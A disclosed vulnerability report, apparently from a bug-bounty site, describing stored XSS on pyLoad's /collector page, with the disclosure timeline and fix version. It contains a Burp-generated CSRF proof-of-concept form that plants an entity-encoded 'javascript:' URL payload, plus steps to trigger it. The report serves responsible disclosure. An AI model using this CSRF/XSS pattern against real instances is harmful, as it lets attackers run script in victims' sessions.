Stored XSS in pyload/pyload


Reported on

Jan 9th 2023


/collector page is vulnerable to stored XSS.


  1. Open the following file in the browser:
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="package" value="XSS" />
      <input type="hidden" name="urls" value="javascript&#58;alert&#40;&#96;XSS&#96;&#41;" />
      <input type="submit" value="Submit request" />
  1. Login as user.
  2. Go to http://localhost:9666/collector
  3. Click XSS > alert(`XSS`)


An attacker can force a victim to run malicious JavaScript code.

We are processing your report and will contact the pyload team within 24 hours. 3 months ago
bAu modified the report
3 months ago
We have contacted a member of the pyload team and are waiting to hear back 3 months ago
pyload/pyload maintainer validated this vulnerability 2 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pyload/pyload maintainer marked this as fixed in 0.5.0b3.dev42 with commit 46d75a 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
pyload/pyload maintainer published this vulnerability 2 months ago
to join this conversation